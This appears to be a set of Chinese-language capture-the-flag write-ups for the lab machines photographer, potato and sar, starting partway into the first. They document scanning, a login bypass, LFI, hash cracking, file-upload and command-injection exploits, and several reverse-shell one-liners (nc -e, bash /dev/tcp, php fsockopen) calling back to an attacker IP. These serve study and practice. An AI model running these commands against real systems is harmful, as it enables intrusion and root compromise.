317B - /images -> http://192.168.146.54/images/ 87 | [16:30:15] 200 - 3KB - /images/ 88 | [16:30:15] 200 - 6KB - /index.html 89 | 90 | ``` 91 | 访问上面三个目录, 都是一些最基本的web资源 92 |
93 | ![Img](../FILES/photographer/img-20220814163238.png) 94 | ![Img](../FILES/photographer/img-20220814163242.png) 95 |
96 | nikto出来的结果并没有多少 97 | ``` 98 | 99 | ┌──(aaron㉿aacai)-[~/Desktop/photographer] 100 | └─$ nikto -h "http://192.168.146.54/" 101 | - Nikto v2.1.6 102 | --------------------------------------------------------------------------- 103 | + Target IP: 192.168.146.54 104 | + Target Hostname: 192.168.146.54 105 | + Target Port: 80 106 | + Start Time: 2022-08-14 16:33:27 (GMT8) 107 | --------------------------------------------------------------------------- 108 | + Server: Apache/2.4.18 (Ubuntu) 109 | + The anti-clickjacking X-Frame-Options header is not present. 110 | + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS 111 | + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type 112 | + No CGI Directories found (use '-C all' to force check all possible dirs) 113 | + IP address found in the 'location' header. The IP is "127.0.1.1". 114 | + OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1". 115 | + Server may leak inodes via ETags, header found with file /, inode: 164f, size: 5aaf04d7cd1a0, mtime: gzip 116 | + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. 117 | + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 118 | + OSVDB-3268: /images/: Directory indexing found. 119 | + OSVDB-3233: /icons/README: Apache default file found. 120 | + 7915 requests: 0 error(s) and 10 item(s) reported on remote host 121 | + End Time: 2022-08-14 16:34:18 (GMT8) (51 seconds) 122 | --------------------------------------------------------------------------- 123 | + 1 host(s) tested 124 | 125 | ``` 126 | 127 | --- 128 | 8000端口 129 | ``` 130 | ┌──(aaron㉿aacai)-[~/Desktop/photographer] 131 | └─$ cat 8000.txt| grep "200" 132 | [16:40:50] 200 - 1020B - /admin/ 133 | [16:40:50] 200 - 1020B - /admin/?/login 134 | [16:40:50] 200 - 1020B - /admin/index.html 135 | [16:40:56] 200 - 114B - /app/ 136 | [16:40:56] 200 - 114B - /app/cache/ 137 | [16:40:56] 200 - 114B - /app/logs/ 138 | [16:41:02] 200 - 4KB - /content/ 139 | [16:41:07] 200 - 3KB - /error/ 140 | [16:41:13] 200 - 4KB - /index.php 141 | [16:42:01] 200 - 4KB - /wp-content/plugins/jrss-widget/proxy.php?url= 142 | 143 | ``` 144 | 145 | 发现了管理员后台 146 | ![Img](../FILES/photographer/img-20220814164633.png) 147 | ### smb枚举 148 | ![Img](../FILES/photographer/img-20220814164733.png) 149 |
150 | 通过smbclient可以发现smbashare是一个share的文件夹 151 |
152 | ![Img](../FILES/photographer/img-20220814164817.png) 153 |
154 | 当我尝试连接的时候, 发现它跟我说\的数量不够, 于是再加两个 155 |
156 | ![Img](../FILES/photographer/img-20220814164834.png) 157 |
158 | 发现已经通过其连接上 159 |
160 | ![Img](../FILES/photographer/img-20220814164900.png) 161 |
162 | 下载mailsent.txt到本地 163 |
164 | ![Img](../FILES/photographer/img-20220814164928.png) 165 |
166 | 发现这是一个关于Daisa的邮件, 然后在login界面我们需要通过邮箱登录, 那就使用这个账号试试 167 |
168 | ![Img](../FILES/photographer/img-20220814165024.png) 169 |
170 | 登录上来了 171 |
172 | 另外在主页我们可以看到这是build with koken 173 |
174 | ![Img](../FILES/photographer/img-20220814165123.png) 175 |
176 | 通过searchsploit我们可以看到这里有一个文件上传(需要身份验证)后的漏洞 177 |
178 | ![Img](../FILES/photographer/img-20220814165254.png) 179 |
180 | 在右下角我们可以发现有一个import content, 接下来我们就来用Burp抓包然后进行文件上传 181 |
182 | ![Img](../FILES/photographer/img-20220814170640.png) 183 | 184 | ## 突破边界 185 | 上传完之后, 就拿到了shell 186 | ![Img](../FILES/photographer/img-20220814170846.png) 187 | 然后发现上面有python, 于是使用python获取可交互式的shell 188 | ![Img](../FILES/photographer/img-20220814170934.png) 189 | ### 提权 190 | 查看带有suid的文件 191 | ``` 192 | find / -perm -u=s -type f 2>/dev/null 193 | /usr/lib/dbus-1.0/dbus-daemon-launch-helper 194 | /usr/lib/eject/dmcrypt-get-device 195 | /usr/lib/xorg/Xorg.wrap 196 | /usr/lib/snapd/snap-confine 197 | /usr/lib/openssh/ssh-keysign 198 | /usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox 199 | /usr/lib/policykit-1/polkit-agent-helper-1 200 | /usr/sbin/pppd 201 | /usr/bin/pkexec 202 | /usr/bin/passwd 203 | /usr/bin/newgrp 204 | /usr/bin/gpasswd 205 | /usr/bin/php7.2 206 | /usr/bin/sudo 207 | /usr/bin/chsh 208 | /usr/bin/chfn 209 | /bin/ping 210 | /bin/fusermount 211 | /bin/mount 212 | /bin/ping6 213 | /bin/umount 214 | /bin/su 215 | ``` 216 | 既然这样我们就可以通过php7.2来进行提权 217 |
218 | ![Img](../FILES/photographer/img-20220814171532.png) 219 |
220 | 直接利用之后得到结果 221 |
222 | ![Img](../FILES/photographer/img-20220814172034.png) 223 |
224 | 这时候有root权限了 225 |
226 | ![Img](../FILES/photographer/img-20220814172119.png) 227 |
228 | 提权成功 -------------------------------------------------------------------------------- /Target Notes/potato.md: -------------------------------------------------------------------------------- 1 | # potato 2 | ## 信息收集 3 | ### 端口扫描 4 | #### NMAP 5 | 全端口 6 | ``` 7 | ┌──(aaron㉿aacai)-[~/Downloads/potato] 8 | └─$ sudo nmap -p- 192.168.146.62 9 | Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-29 15:29 HKT 10 | Nmap scan report for 192.168.146.62 11 | Host is up (0.00025s latency). 12 | Not shown: 65532 closed tcp ports (reset) 13 | PORT STATE SERVICE 14 | 22/tcp open ssh 15 | 80/tcp open http 16 | 2112/tcp open kip 17 | MAC Address: 00:0C:29:FB:BC:B1 (VMware) 18 | 19 | Nmap done: 1 IP address (1 host up) scanned in 8.23 seconds 20 | 21 | ``` 22 | 指定端口 23 | ``` 24 | ┌──(aaron㉿aacai)-[~/Downloads/potato] 25 | └─$ sudo nmap -p22,80,2112 192.168.146.62 26 | Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-29 15:30 HKT 27 | Nmap scan report for 192.168.146.62 28 | Host is up (0.00049s latency). 29 | 30 | PORT STATE SERVICE 31 | 22/tcp open ssh 32 | 80/tcp open http 33 | 2112/tcp open kip 34 | MAC Address: 00:0C:29:FB:BC:B1 (VMware) 35 | 36 | Nmap done: 1 IP address (1 host up) scanned in 6.76 seconds 37 | 38 | ┌──(aaron㉿aacai)-[~/Downloads/potato] 39 | └─$ sudo nmap -p22,80,2112 -sV -A 192.168.146.62 40 | Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-29 15:30 HKT 41 | Nmap scan report for 192.168.146.62 42 | Host is up (0.00035s latency). 43 | 44 | PORT STATE SERVICE VERSION 45 | 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 46 | | ssh-hostkey: 47 | | 3072 ef:24:0e:ab:d2:b3:16:b4:4b:2e:27:c0:5f:48:79:8b (RSA) 48 | | 256 f2:d8:35:3f:49:59:85:85:07:e6:a2:0e:65:7a:8c:4b (ECDSA) 49 | |_ 256 0b:23:89:c3:c0:26:d5:64:5e:93:b7:ba:f5:14:7f:3e (ED25519) 50 | 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) 51 | |_http-title: Potato company 52 | |_http-server-header: Apache/2.4.41 (Ubuntu) 53 | 2112/tcp open ftp ProFTPD 54 | | ftp-anon: Anonymous FTP login allowed (FTP code 230) 55 | | -rw-r--r-- 1 ftp ftp 901 Aug 2 2020 index.php.bak 56 | |_-rw-r--r-- 1 ftp ftp 54 Aug 2 2020 welcome.msg 57 | MAC Address: 00:0C:29:FB:BC:B1 (VMware) 58 | Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 59 | Device type: general purpose 60 | Running: Linux 4.X|5.X 61 | OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 62 | OS details: Linux 4.15 - 5.6 63 | Network Distance: 1 hop 64 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 65 | 66 | TRACEROUTE 67 | HOP RTT ADDRESS 68 | 1 0.35 ms 192.168.146.62 69 | 70 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 71 | Nmap done: 1 IP address (1 host up) scanned in 31.67 seconds 72 | 73 | ``` 74 | ### FTP信息收集 75 | 因为在nmap收集信息的时候, 看到FTP允许匿名登录, 所以登录上去查看一下能否下载文件 76 | ``` 77 | └─$ ftp 192.168.146.62 2112 78 | Connected to 192.168.146.62. 79 | 220 ProFTPD Server (Debian) [::ffff:192.168.146.62] 80 | Name (192.168.146.62:aaron): anonymous 81 | 331 Anonymous login ok, send your complete email address as your password 82 | Password: 83 | 230-Welcome, archive user anonymous@192.168.146.50 ! 84 | 230- 85 | 230-The local time is: Fri Jul 29 07:34:13 2022 86 | 230- 87 | 230 Anonymous access granted, restrictions apply 88 | Remote system type is UNIX. 89 | Using binary mode to transfer files. 90 | ftp> ls 91 | 229 Entering Extended Passive Mode (|||44960|) 92 | 150 Opening ASCII mode data connection for file list 93 | -rw-r--r-- 1 ftp ftp 901 Aug 2 2020 index.php.bak 94 | -rw-r--r-- 1 ftp ftp 54 Aug 2 2020 welcome.msg 95 | 226 Transfer complete 96 | ftp> get index.php.bak 97 | local: index.php.bak remote: index.php.bak 98 | 229 Entering Extended Passive Mode (|||53662|) 99 | 150 Opening BINARY mode data connection for index.php.bak (901 bytes) 100 | 901 11.45 MiB/s 101 | 226 Transfer complete 102 | 901 bytes received in 00:00 (1.85 MiB/s) 103 | ftp> get welcome.msg 104 | local: welcome.msg remote: welcome.msg 105 | 229 Entering Extended Passive Mode (|||54469|) 106 | 150 Opening BINARY mode data connection for welcome.msg (54 bytes) 107 | 54 1.19 MiB/s 108 | 226 Transfer complete 109 | 54 bytes received in 00:00 (108.06 KiB/s) 110 | ftp> exit 111 | 221 Goodbye. 112 | ``` 113 | 可以下载, 下载之后查看一下里面的信息 114 | ``` 115 | └─$ cat welcome.msg 116 | Welcome, archive user %U@%R ! 117 | 118 | The local time is: %T 119 | 120 | ┌──(aaron㉿aacai)-[~/Desktop/potato] 121 | └─$ cat index.php.bak 122 | 123 | 124 | 125 | 126 | Go to the dashboard"; 133 | setcookie('pass', $pass, time() + 365*24*3600); 134 | }else{ 135 | echo "

Bad login/password!
Return to the login page

"; 136 | } 137 | exit(); 138 | } 139 | ?> 140 | 141 | 142 |

143 |

Login

144 | 145 | 146 |
147 | 148 | 149 |
150 | 151 |
152 | 153 | 154 | 155 | ``` 156 | 发现是一个php的源码, 并且$pass=potato 157 | ### WEB页面信息收集 158 | 直接访问页面只能发现两段文字和一张土豆的图片 159 |
160 | ![Img](../FILES/potato/img-20220729153814.png) 161 |
162 | 试试目录枚举 163 | ``` 164 | └─$ dirsearch -u "192.168.146.62" 165 | 166 | _|. _ _ _ _ _ _|_ v0.4.2 167 | (_||| _) (/_(_|| (_| ) 168 | 169 | Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927 170 | 171 | Output File: /home/aaron/.dirsearch/reports/192.168.146.62_22-07-29_15-38-50.txt 172 | 173 | Error Log: /home/aaron/.dirsearch/logs/errors-22-07-29_15-38-50.log 174 | 175 | Target: http://192.168.146.62/ 176 | 177 | [15:38:50] Starting: 178 | [15:38:56] 301 - 316B - /admin -> http://192.168.146.62/admin/ 179 | [15:38:56] 200 - 466B - /admin/ 180 | [15:38:56] 200 - 466B - /admin/?/login 181 | [15:38:57] 200 - 466B - /admin/index.php 182 | [15:38:57] 200 - 1KB - /admin/logs/ 183 | [15:39:10] 200 - 245B - /index.php 184 | [15:39:10] 200 - 245B - /index.php/login/ 185 | 186 | ``` 187 | 发现了admin目录, 查看页面源代码 188 |
189 | ![Img](../FILES/potato/img-20220729154016.png) 190 | 发现布局是跟我们一开始获取到的.bak一样的 191 |
192 | 分析一下源码 193 | ``` 194 | Go to the dashboard"; 201 | setcookie('pass', $pass, time() + 365*24*3600); 202 | }else{ 203 | echo "

Bad login/password!
Return to the login page

"; 204 | } 205 | exit(); 206 | } 207 | ?> 208 | 在这个地方使用了strcmp函数来比较提交的admin和$password 209 | 而我们需要让这两个变量的值==0, 这时候用到owasp官网的一个文档 210 | https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf 211 | 这里面介绍了一个利用的方法 212 | ``` 213 | ![Img](../FILES/potato/img-20220729154958.png) 214 |
215 | 在这里, 我们提交的参数默认为username=admin&password="123456",使用password[]即可代替一个password string 216 |
217 | 使用burp抓包更改提交参数并重发包查看响应包 218 |
219 | 第一次的时候我并没有改password的变量名, 所以发过去响应回来是bad user/password 220 | ![Img](../FILES/potato/img-20220729160517.png) 221 |
222 | 修改password的变量名, 重发 223 | ![Img](../FILES/potato/img-20220729160645.png) 224 |
225 | 这次返回回来了welcome, 接下来去proxy发送出去 226 |
227 | ![Img](../FILES/potato/img-20220729160750.png) 228 |
229 | 然后可以进入dashboard.php的界面 230 |
231 | 查看各个不同的界面 232 |
233 | ![Img](../FILES/potato/img-20220729161328.png) 234 |
235 | ![Img](../FILES/potato/img-20220729161341.png) 236 |
237 | ![Img](../FILES/potato/img-20220729161351.png) 238 |
239 | ![Img](../FILES/potato/img-20220729161404.png) 240 | ![Img](../FILES/potato/img-20220729161413.png) 241 | ![Img](../FILES/potato/img-20220729161419.png) 242 |
243 | ![Img](../FILES/potato/img-20220729161432.png) 244 |
245 | 可以看到ping这个界面是可以回显命令的 246 |
247 | 那么说不定这里面就有LFI, 使用burp一点点试试看 248 | ![Img](../FILES/potato/img-20220729162150.png) 249 |
250 | 果然, 存在LFI 251 |
252 | 并且在最后一行显示出了一个webadmin的hash密码, 保存到本地用john爆破一下 253 | ``` 254 | ┌──(aaron㉿aacai)-[~/Desktop/potato] 255 | └─$ john passwd.txt 256 | Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long" 257 | Use the "--format=md5crypt-long" option to force loading these as that type instead 258 | Using default input encoding: UTF-8 259 | Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3]) 260 | Will run 4 OpenMP threads 261 | Proceeding with single, rules:Single 262 | Press 'q' or Ctrl-C to abort, almost any other key for status 263 | Almost done: Processing the remaining buffered candidate passwords, if any. 264 | Proceeding with wordlist:/usr/share/john/password.lst 265 | dragon (webadmin) 266 | 1g 0:00:00:00 DONE 2/3 (2022-07-29 16:25) 33.33g/s 42000p/s 42000c/s 42000C/s 123456..larry 267 | Use the "--show" option to display all of the cracked passwords reliably 268 | Session completed. 269 | 270 | ┌──(aaron㉿aacai)-[~/Desktop/potato] 271 | └─$ 272 | 273 | ``` 274 | 很轻松的跑出来了 275 | ## 突破边界 276 | 使用ssh登录 277 | ``` 278 | webadmin@serv:~$ ip a 279 | 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 280 | link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 281 | inet 127.0.0.1/8 scope host lo 282 | valid_lft forever preferred_lft forever 283 | inet6 ::1/128 scope host 284 | valid_lft forever preferred_lft forever 285 | 2: ens33: mtu 1500 qdisc fq_codel state UP group default qlen 1000 286 | link/ether 00:0c:29:fb:bc:b1 brd ff:ff:ff:ff:ff:ff 287 | inet 192.168.146.62/24 brd 192.168.146.255 scope global dynamic ens33 288 | valid_lft 68449sec preferred_lft 68449sec 289 | inet6 fe80::20c:29ff:fefb:bcb1/64 scope link 290 | valid_lft forever preferred_lft forever 291 | webadmin@serv:~$ whoami 292 | webadmin 293 | webadmin@serv:~$ ls 294 | user.txt 295 | webadmin@serv:~$ cat user.txt 296 | TGUgY29udHLDtGxlIGVzdCDDoCBwZXUgcHLDqHMgYXVzc2kgcsOpZWwgcXXigJl1bmUg 297 | webadmin@serv:~$ id 298 | uid=1001(webadmin) gid=1001(webadmin) groups=1001(webadmin) 299 | webadmin@serv:~$ 300 | ``` 301 | 获取到了user的flag 302 |
303 | 查看目录下的文件 304 | ``` 305 | webadmin@serv:~$ ls -al 306 | total 32 307 | drwxr-xr-x 3 webadmin webadmin 4096 Aug 2 2020 . 308 | drwxr-xr-x 4 root root 4096 Aug 2 2020 .. 309 | -rw------- 1 webadmin webadmin 357 Aug 2 2020 .bash_history 310 | -rw-r--r-- 1 webadmin webadmin 220 Aug 2 2020 .bash_logout 311 | -rw-r--r-- 1 webadmin webadmin 3771 Aug 2 2020 .bashrc 312 | drwx------ 2 webadmin webadmin 4096 Aug 2 2020 .cache 313 | -rw-r--r-- 1 webadmin webadmin 807 Aug 2 2020 .profile 314 | -rw------- 1 webadmin root 69 Aug 2 2020 user.txt 315 | webadmin@serv:~$ 316 | 查看.bash_history 317 | webadmin@serv:~$ cat .bash_history 318 | ls 319 | exit 320 | ls 321 | sudo -l 322 | exit 323 | sudo -l 324 | exit 325 | sudo -l 326 | exit 327 | ls 328 | sudo -l 329 | sudo /bin/cat /etc/passwd 330 | sudo /bin/cat /etc/passwd ; ls /root 331 | exit 332 | sudo -l 333 | mkdir notes 334 | exit 335 | ls 336 | cd .. 337 | sudi -l 338 | sudo -l 339 | sudo /bin/ls /root/notes/test.txt 340 | sudo /bin/ls /root/notes/test.txt /root 341 | exit 342 | sudo /bin/nice /root/notes/ 343 | sudo /bin/nice /root/notes/* 344 | ls 345 | exit 346 | sudo /bin/nice /root/notes/* 347 | exit 348 | ``` 349 | 在这里面可以看到该用户使用了sudo, 那么这个用户是拥有sudo权限的文件的, 用sudo -l查看一下 350 | ``` 351 | webadmin@serv:~$ sudo -l 352 | [sudo] password for webadmin: 353 | Matching Defaults entries for webadmin on serv: 354 | env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 355 | 356 | User webadmin may run the following commands on serv: 357 | (ALL : ALL) /bin/nice /notes/* 358 | webadmin@serv:~$ 359 | 360 | ``` 361 | 这里跟我们说用户可以使用/bin/nice去执行/notes/下任意的东西 362 | ![Img](../FILES/potato/img-20220729163028.png) 363 |
364 | 并且这里都是使用root权限才可以查看的, nice查看一下 365 | ``` 366 | webadmin@serv:/notes$ sudo /bin/nice /notes/id.sh 367 | uid=0(root) gid=0(root) groups=0(root) 368 | webadmin@serv:/notes$ 369 | 370 | ``` 371 | 原来这里就是直接执行命令, 那我们写一个nc的sh 372 | 373 | ``` 374 | webadmin@serv:~$ echo "nc -e /bin/sh 192.168.146.50 4444" >> nc.sh 375 | webadmin@serv:~$ ls 376 | nc.sh user.txt 377 | webadmin@serv:~$ pwd 378 | /home/webadmin 379 | webadmin@serv:~$ sudo /bin/nice /notes/../home/webadmin/nc.sh 380 | /bin/nice: ‘/notes/../home/webadmin/nc.sh’: Permission denied 381 | webadmin@serv:~$ chmod 777 nc.sh 382 | webadmin@serv:~$ sudo /bin/nice /notes/../home/webadmin/nc.sh 383 | 384 | ``` 385 | 最后, 起监听, 接shell 386 | 387 | ``` 388 | ┌──(aaron㉿aacai)-[~/Desktop/potato] 389 | └─$ nc -lvnp 4444 390 | listening on [any] 4444 ... 391 | connect to [192.168.146.50] from (UNKNOWN) [192.168.146.62] 38818 392 | id 393 | uid=0(root) gid=0(root) groups=0(root) 394 | ip a 395 | 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 396 | link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 397 | inet 127.0.0.1/8 scope host lo 398 | valid_lft forever preferred_lft forever 399 | inet6 ::1/128 scope host 400 | valid_lft forever preferred_lft forever 401 | 2: ens33: mtu 1500 qdisc fq_codel state UP group default qlen 1000 402 | link/ether 00:0c:29:fb:bc:b1 brd ff:ff:ff:ff:ff:ff 403 | inet 192.168.146.62/24 brd 192.168.146.255 scope global dynamic ens33 404 | valid_lft 67885sec preferred_lft 67885sec 405 | inet6 fe80::20c:29ff:fefb:bcb1/64 scope link 406 | valid_lft forever preferred_lft forever 407 | cd 408 | ls 409 | root.txt 410 | snap 411 | cat root.txt 412 | bGljb3JuZSB1bmlqYW1iaXN0ZSBxdWkgZnVpdCBhdSBib3V0IGTigJl1biBkb3VibGUgYXJjLWVuLWNpZWwuIA== 413 | whoami 414 | root 415 | ``` 416 | ![Img](../FILES/potato/img-20220729163655.png) 417 | 418 | -------------------------------------------------------------------------------- /Target Notes/sar.md: -------------------------------------------------------------------------------- 1 | # sar-192.168.146.58 2 | ## 信息收集 3 | ### 全端口扫描 4 | ``` 5 | └─$ sudo nmap -p- 192.168.146.58 6 | [sudo] password for aacai: 7 | Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-21 11:32 HKT 8 | Nmap scan report for 192.168.146.58 9 | Host is up (0.00012s latency). 10 | Not shown: 65534 closed ports 11 | PORT STATE SERVICE 12 | 80/tcp open http 13 | MAC Address: 00:0C:29:8A:FF:1A (VMware) 14 | ``` 15 | ### 指定端口扫描 16 | ``` 17 | └─$ sudo nmap -p80 -sV -A 192.168.146.58 18 | Starting Nmap 7.91 ( https://nmap.org ) at 2022-07-21 11:32 HKT 19 | Nmap scan report for 192.168.146.58 20 | Host is up (0.00028s latency). 21 | 22 | PORT STATE SERVICE VERSION 23 | 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 24 | |_http-server-header: Apache/2.4.29 (Ubuntu) 25 | |_http-title: Apache2 Ubuntu Default Page: It works 26 | MAC Address: 00:0C:29:8A:FF:1A (VMware) 27 | Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port 28 | Device type: general purpose 29 | Running: Linux 4.X|5.X 30 | OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 31 | OS details: Linux 4.15 - 5.6 32 | Network Distance: 1 hop 33 | 34 | TRACEROUTE 35 | HOP RTT ADDRESS 36 | 1 0.28 ms 192.168.146.58 37 | 38 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 39 | Nmap done: 1 IP address (1 host up) scanned in 14.80 seconds 40 | 41 | ``` 42 | ### web信息收集 43 | ``` 44 | ┌──(aacai㉿kali)-[~/Desktop/gooann/sar-192.168.146.58] 45 | └─$ nikto -h 192.168.146.58 46 | - Nikto v2.1.6 47 | --------------------------------------------------------------------------- 48 | + Target IP: 192.168.146.58 49 | + Target Hostname: 192.168.146.58 50 | + Target Port: 80 51 | + Start Time: 2022-07-21 11:33:47 (GMT8) 52 | --------------------------------------------------------------------------- 53 | + Server: Apache/2.4.29 (Ubuntu) 54 | + The anti-clickjacking X-Frame-Options header is not present. 55 | + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS 56 | + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type 57 | + No CGI Directories found (use '-C all' to force check all possible dirs) 58 | + Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 59558e1434548, mtime: gzip 59 | + Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. 60 | + Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 61 | + /phpinfo.php: Output from the phpinfo() function was found. 62 | + OSVDB-3233: /phpinfo.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. 63 | + OSVDB-3233: /icons/README: Apache default file found. 64 | + 7915 requests: 0 error(s) and 9 item(s) reported on remote host 65 | + End Time: 2022-07-21 11:34:37 (GMT8) (50 seconds) 66 | --------------------------------------------------------------------------- 67 | + 1 host(s) tested 68 | 69 | ┌──(aacai㉿kali)-[~/Desktop/gooann/sar-192.168.146.58] 70 | └─$ 71 | 72 | └─$ dirb http://192.168.146.58 73 | 74 | ----------------- 75 | DIRB v2.22 76 | By The Dark Raver 77 | ----------------- 78 | 79 | START_TIME: Thu Jul 21 11:34:48 2022 80 | URL_BASE: http://192.168.146.58/ 81 | WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt 82 | 83 | ----------------- 84 | 85 | GENERATED WORDS: 4612 86 | 87 | ---- Scanning URL: http://192.168.146.58/ ---- 88 | + http://192.168.146.58/index.html (CODE:200|SIZE:10918) 89 | + http://192.168.146.58/phpinfo.php (CODE:200|SIZE:95507) 90 | + http://192.168.146.58/robots.txt (CODE:200|SIZE:9) 91 | + http://192.168.146.58/server-status (CODE:403|SIZE:279) 92 | 93 | ----------------- 94 | END_TIME: Thu Jul 21 11:34:50 2022 95 | DOWNLOADED: 4612 - FOUND: 4 96 | 97 | ``` 98 | ### web页面信息收集 99 | ![IMG](../FILES/sar/img-20220721113820.png) 100 | ![IMG](../FILES/sar/img-20220721113828.png) 101 | 102 | ``` 103 | └─$ searchsploit apache 2.4.29 104 | ----------------------------------------------------------------------------------------------------------------------------- --------------------------------- 105 | Exploit Title | Path 106 | ----------------------------------------------------------------------------------------------------------------------------- --------------------------------- 107 | Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | php/remote/29290.c 108 | Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py 109 | Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation | linux/local/46676.php 110 | Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service | multiple/dos/26710.txt 111 | Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow | unix/remote/21671.c 112 | Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1) | unix/remote/764.c 113 | Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2) | unix/remote/47080.c 114 | Apache OpenMeetings 1.9.x < 3.1.0 - '.ZIP' File Directory Traversal | linux/webapps/39642.txt 115 | Apache Tomcat < 5.5.17 - Remote Directory Listing | multiple/remote/2061.txt 116 | Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal | unix/remote/14489.c 117 | Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC) | multiple/remote/6229.txt 118 | Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1) | windows/webapps/42953.txt 119 | Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2) | jsp/webapps/42966.py 120 | Apache Xerces-C XML Parser < 3.1.2 - Denial of Service (PoC) | linux/dos/36906.txt 121 | Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution | linux/remote/34.pl 122 | ----------------------------------------------------------------------------------------------------------------------------- --------------------------------- 123 | Shellcodes: No Results 124 | 125 | searchsploit php 7.1 | grep -v "WordPress\|Drupal\|.php" 126 | ----------------------------------------------------------------------------------------------------------------------------- --------------------------------- 127 | Exploit Title | Path 128 | ----------------------------------------------------------------------------------------------------------------------------- --------------------------------- 129 | FirePHP Firefox Plugin 0.7.1 - Remote Command Execution | windows/remote/24961.html 130 | ----------------------------------------------------------------------------------------------------------------------------- --------------------------------- 131 | Shellcodes: No Results 132 | 133 | ``` 134 | ![IMG](../FILES/sar/img-20220721114624.png) 135 | ![IMG](../FILES/sar/img-20220721114631.png) 136 | 137 | ![IMG](../FILES/sar/img-20220721114822.png) 138 | ![IMG](../FILES/sar/img-20220721114914.png) 139 | >https://www.exploit-db.com/exploits/49344 140 | ``` 141 | └─$ python3 exploit.py 1 ⨯ 142 | Enter The url => http://192.168.146.58/sar2HTML/ 143 | Command => whoami 144 | www-data 145 | 146 | Command => nc 192.168.146.64 4444 -e /bin/bash 147 | 148 | Command => nc 192.168.146.63 4444 -e /bin/bash 149 | 150 | Command => bash -i >& /dev/tcp/192.168.146.63/4444 0>&1 151 | 152 | Command => bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.146.63%2F4444%200%3E%261 153 | 154 | Command => whoami 155 | www-data 156 | 157 | Command => ls 158 | LICENSE 159 | index.php 160 | sar2html 161 | sarDATA 162 | sarFILE 163 | 164 | Command => nc 165 | Command => php%20-r%20'%24sock%3Dfsockopen(%22192.168.146.63%22%2C4444)%3Bexec(%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22)%3B' 166 | ``` 167 | ### 提权 168 | ``` 169 | └─$ nc -nvlp 4444 1 ⨯ 170 | listening on [any] 4444 ... 171 | connect to [192.168.146.63] from (UNKNOWN) [192.168.146.58] 48596 172 | /bin/sh: 0: can't access tty; job control turned off 173 | $ id 174 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 175 | $ ls 176 | LICENSE 177 | index.php 178 | sar2html 179 | sarDATA 180 | sarFILE 181 | $ python -c 'import pty; pty.spawn("/bin/bash")' 182 | /bin/sh: 3: python: not found 183 | $ /usr/bin/script -qc /bin/bash /dev/null 184 | www-data@sar:/var/www/html/sar2HTML$ ls -al 185 | ls -al 186 | total 160 187 | drwxr-xr-x 4 www-data www-data 4096 Oct 20 2019 . 188 | drwxr-xr-x 3 www-data www-data 4096 Oct 21 2019 .. 189 | -rwxr-xr-x 1 www-data www-data 35149 Mar 14 2019 LICENSE 190 | -rwxr-xr-x 1 www-data www-data 53446 Mar 19 2019 index.php 191 | -rwxr-xr-x 1 www-data www-data 53165 Mar 19 2019 sar2html 192 | drwxr-xr-x 3 www-data www-data 4096 Oct 20 2019 sarDATA 193 | 